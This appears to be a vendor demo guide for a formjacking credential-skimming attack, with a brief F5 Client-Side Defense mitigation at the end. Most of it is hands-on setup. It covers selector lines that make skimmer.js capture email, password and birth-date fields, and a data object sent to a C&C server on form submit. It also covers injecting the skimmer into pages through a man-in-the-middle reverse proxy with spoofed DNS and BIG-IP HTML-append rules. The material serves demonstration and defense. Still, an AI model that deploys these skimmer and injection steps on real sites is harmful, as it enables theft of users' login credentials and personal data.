Formjacking Attack

Contents

• Introduction
• Configuration guide
• Deployment guide
  • C&C server
  • Man In the Middle
• Mitigation guide

Introduction

This blog provides a formjacking code in order to understand how it works.

F5 customers are protected from magecart style attack by F5 Client-Side Defense:

• Analyse the behavior of all Javascripts executed on your website
• Alert your Cyber-SOC team if a javascript behaves like a malware and take action immediately (allow/block)
• Block malicious Javascript execution

Thanks to unit42 that did a great blog here on this topic.

Configuration guide

• Open the web page with targeted form
• Inspect input elements to grab user data. Each element can be identified by an id, a name, a type, etc...

<input ... id="login-credentials-form-password" name="password-uuid" type="password" ...>

• Open the file skimmer.js
• Update the first 2 or 3 lines describing input elements to grab user data.

window["data_leak_label_email"] = ["input[id*='login-credentials-form-email']", "input[name*='email']", "input[type*='email']"]
window["data_leak_label_password"] = ["input[id*='login-credentials-form-password']", "input[name*='password']"]
window["data_leak_label_birth_date"] = ["input[id*='login-credentials-form-birthdate']", "input[name*='birthDate']"]

• Go back to the web page, inspect button elements when the user submit the form

<button ... type="submit" id="login-button">

• In skimmer.js, the
• The fourth line describes button element to watch in order to send data to remote C&C server.

window["data_leak_label_submit_button"] = ["button[id*='login-button']"]

• If the form contains more or less input fields, update function listener_fetch_data_leak() in order to have exactly all required input elements defined previously

data_leak = {
    "email": get_element_value(window["data_leak_label_email"]),
    "password": get_element_value(window["data_leak_label_password"]),
    "birth_date": get_element_value(window["data_leak_label_birth_date"]),
    "uagent": navigator.userAgent
}

Deployment guide

C&C server

• Run C&C server as described here

Man In the Middle

• Run a Reverse-Proxy that acts as a Man-In-The-Middle: forward all traffic to ORIGIN servers
• If DNS domain is spoofed, rewrite SNI and headers (HOST, ORIGIN and eventually others required by the App)
• Inject malware JS skimmer.js in all or specific pages

BIG-IP UI configuration for JS insertion:

Local Traffic ›› Profiles : Content : HTML : Rules /Common/form_grabber +-- Match settings ›› Match Tag Name: head +-- Action settings ›› HTML to Append: copy paste content of skimmer.js surrounded by <script>...</script>

Local Traffic ›› Profiles : Content : HTML : /Common/html-demo +-- HTML rules: form_grabber

Local Traffic ›› Virtual Servers ›› vs-demo +-- HTML Profile: html-demo

• Enable compression on client-side / downstream-side if ORIGIN servers use compression

Mitigation guide

• Connect to F5 Distributed Cloud
• Get your Client Side Defense JS (CSD)
• Inject CSD JS as well in the web page to protect

BIG-IP UI configuration for JS insertion:

Local Traffic ›› Profiles : Content : HTML : Rules /Common/f5_csd +-- Match settings ›› Match Tag Name: head +-- Action settings ›› HTML to Append: copy paste F5 CSD JS link

Local Traffic ›› Profiles : Content : HTML : /Common/html-demo +-- HTML rules: form_grabber + f5_csd